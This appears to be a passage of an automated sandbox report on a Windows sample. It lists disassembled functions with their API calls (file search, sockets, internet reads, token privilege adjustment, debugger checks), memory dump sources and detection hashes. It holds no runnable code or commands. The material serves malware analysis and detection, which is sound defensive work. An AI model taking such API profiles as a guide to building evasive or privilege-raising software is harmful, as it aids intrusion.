                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00D5A5BD
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00D5A6D0
                                                                                                                                                                                                                                                                    • Part of subcall function 00D542B9: GetInputState.USER32 ref: 00D54310
                                                                                                                                                                                                                                                                    • Part of subcall function 00D542B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D543AB
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00D5A5ED
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00D5A6BA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                                                  • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                  • Opcode ID: 9c5b21d6a3241873b78cc27b9ad3454746a31805e6a1acf9c338de892f3d6f3f
                                                                                                                                                                                                                                                                  • Instruction ID: 5f05f0b5c4f42bb7b0a40988a02ca17650ccea815734513b413e09aa081457e3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c5b21d6a3241873b78cc27b9ad3454746a31805e6a1acf9c338de892f3d6f3f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8541627190021A9FCF15EF68CC49AEEBBB5EF15311F184156EC05A21A1EB319E88DF71
                                                                                                                                                                                                                                                                  Function 00CE22AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,?), ref: 00CE233E
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00CE2421
                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00CE2434
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Color$Proc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 929743424-0
                                                                                                                                                                                                                                                                  • Opcode ID: dae6d0dea9582853c57a1c94cfa36f187942b6e701eac2a14b2e1e9ce4fa359d
                                                                                                                                                                                                                                                                  • Instruction ID: 9b515d7870ce445a5f80556857ee1bc6f206fb842ca5daf55b66b29e35d4a5b0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dae6d0dea9582853c57a1c94cfa36f187942b6e701eac2a14b2e1e9ce4fa359d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C8175F12081E0BEE639663F9C98F7F255EEB92304F194209F103C66A5C96DCF429672
                                                                                                                                                                                                                                                                  Function 00D62263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D63AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00D63AD7
                                                                                                                                                                                                                                                                    • Part of subcall function 00D63AAB: _wcslen.LIBCMT ref: 00D63AF8
                                                                                                                                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00D622BA
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D622E1
                                                                                                                                                                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00D62338
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D62343
                                                                                                                                                                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00D62372
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                  • Opcode ID: a8d21a4def022791e2fc6545a4d53c33be0d3c822db7b4c8bba17b102177fe58
                                                                                                                                                                                                                                                                  • Instruction ID: b792d06ca679ce88e0e7b81869c5c8803298db3fcab28f2fd80cd5cdd8253faf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8d21a4def022791e2fc6545a4d53c33be0d3c822db7b4c8bba17b102177fe58
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D751B075A00250AFEB10AF24C896F2A77E5AB44754F08808CF9499F3D3DB75AD42DBA1
                                                                                                                                                                                                                                                                  Function 00D726DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 292994002-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8fe80186dffd2715b9af66f440f6fd29f3a0a4228fa033abea454c4046874061
                                                                                                                                                                                                                                                                  • Instruction ID: 861f7ef58c90a86246c5a49324620acfcc9097d121d423564284df7eb47b1373
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fe80186dffd2715b9af66f440f6fd29f3a0a4228fa033abea454c4046874061
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E421D1317002908FD7189F2AC944B2A7BE9EF85314B19C069E84ECB351E771ED42CBB0
                                                                                                                                                                                                                                                                  Function 00D5D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00D5D8CE
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00D5D92F
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000000), ref: 00D5D943
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 234945975-0
                                                                                                                                                                                                                                                                  • Opcode ID: 32ea34c6c446105b68d4a26ad485ab07df705fdaa4168ddafd23b21f3b0cd74c
                                                                                                                                                                                                                                                                  • Instruction ID: 21c32d03b1f16a75704df1296ba491ac693af0e6e19fedf6741304d72fa5201b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32ea34c6c446105b68d4a26ad485ab07df705fdaa4168ddafd23b21f3b0cd74c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F219071500705AFEB309F65D844BAA77F9EF40316F14441AE94AD2251E770EA49CFB0
                                                                                                                                                                                                                                                                  Function 00D4E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,00D246AC), ref: 00D4E482
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00D4E491
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00D4E4A2
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D4E4AE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                  • Opcode ID: c25e9ce0926c4f2bee2984406db7a6b6498b4b7447bbb4b6d0121c9c6f7e141f
                                                                                                                                                                                                                                                                  • Instruction ID: 41e2806dbd3eb2c1c4ef1fcaa8565d821699ab867fe26136a6a115df54b6b3ba
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c25e9ce0926c4f2bee2984406db7a6b6498b4b7447bbb4b6d0121c9c6f7e141f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6F0A030410A106B92106738AC0D8AA777EBE02335B944701F87EC22E0EB78D99686B9
                                                                                                                                                                                                                                                                  Function 00D3E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                                                                                  • String ID: %.3d$X64
                                                                                                                                                                                                                                                                  • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                  • Opcode ID: 532ad0479a078687cf5c144a2e0283d50ec25290ebf1c25e8399b6dab7df1640
                                                                                                                                                                                                                                                                  • Instruction ID: 4142d4d13e4140acfd27b4072fb6f422897455fc3711cc8212558527f5fcc4c4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 532ad0479a078687cf5c144a2e0283d50ec25290ebf1c25e8399b6dab7df1640
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11D012B1C0420CDACBD096909C4ADB9737CAB18300F104C66F946E10C1F620D948AB32
                                                                                                                                                                                                                                                                  Function 00D12992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00D12A8A
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00D12A94
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00D12AA1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                  • Opcode ID: d65d35f111acc06909373c15a7aa050f57f288f014710f3c1292292530687969
                                                                                                                                                                                                                                                                  • Instruction ID: f289ab544121fe4143f8176045b0210a0b63748556ae68381087254f0750f33d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d65d35f111acc06909373c15a7aa050f57f288f014710f3c1292292530687969
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C31B675901218ABCB21DF68DD897DDBBB4AF08310F5041DAE40CA6291EB719BC58F65
                                                                                                                                                                                                                                                                  Function 00D42010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00D009D8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00D009F5
                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D4205A
                                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D42087
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D42097
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 577356006-0
                                                                                                                                                                                                                                                                  • Opcode ID: ba0beff890d6fc399d19a007c5bcfa3183ece61a2c2a42210b6a1c339254f859
                                                                                                                                                                                                                                                                  • Instruction ID: 04e8ae29c04d2eddb7bf604ff2ca9e56a5cc3d9564c03730902ad0347f2c2b70
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba0beff890d6fc399d19a007c5bcfa3183ece61a2c2a42210b6a1c339254f859
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7116DB1414305AFD7289F54EC86E6ABBF9EF44710B20851EF05A96291EB70EC41CA74
                                                                                                                                                                                                                                                                  Function 00D05058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,00D0502E,?,00DA98D8,0000000C,00D05185,?,00000002,00000000), ref: 00D05079
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00D0502E,?,00DA98D8,0000000C,00D05185,?,00000002,00000000), ref: 00D05080
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00D05092
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                  • Opcode ID: 97c04059a867e67f36ab88bb1a723f7a9be853e01e0aec3d71cddd6c1ca4c05f
                                                                                                                                                                                                                                                                  • Instruction ID: 0cd623065470543062864672750e6938f7d36de480712886490fb7b88ba8fad3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97c04059a867e67f36ab88bb1a723f7a9be853e01e0aec3d71cddd6c1ca4c05f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E09231400648AFCB216F64ED09A593B6AEF50385B154054FC4D9A261EB36A982CEB0
                                                                                                                                                                                                                                                                  Function 00D4ECD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00D4ED04
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: mouse_event
                                                                                                                                                                                                                                                                  • String ID: DOWN
                                                                                                                                                                                                                                                                  • API String ID: 2434400541-711622031
                                                                                                                                                                                                                                                                  • Opcode ID: 889b4f26383d212b7c37fa9fbc1965156269e8f21c422087e546c1b52c2708d8
                                                                                                                                                                                                                                                                  • Instruction ID: 8de440fd2ffe11f08e1eb522588b184adc26e2b82cd177b6329e3823320710ce
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 889b4f26383d212b7c37fa9fbc1965156269e8f21c422087e546c1b52c2708d8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2E0EC661AD7263EF94821287C07FF6034DAF23734B154246F904E51C0EE955D8665B9
                                                                                                                                                                                                                                                                  Function 00D3E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00D3E664
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: NameUser
                                                                                                                                                                                                                                                                  • String ID: X64
                                                                                                                                                                                                                                                                  • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                  • Opcode ID: 5b8838f89a6e0a6d29ed05293bf1e20585e833f1140071312026af944366c4eb
                                                                                                                                                                                                                                                                  • Instruction ID: df6dfa597363dce39c8ee5d0fa6a5292974a60725260ef74fbad45d80781c51d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b8838f89a6e0a6d29ed05293bf1e20585e833f1140071312026af944366c4eb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35D0C9B480121DEACF90CB90EC88ED9777CBB04304F100A55F146E2140D73095488B20
                                                                                                                                                                                                                                                                  Function 00D541FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00D652EE,?,?,00000035,?), ref: 00D54229
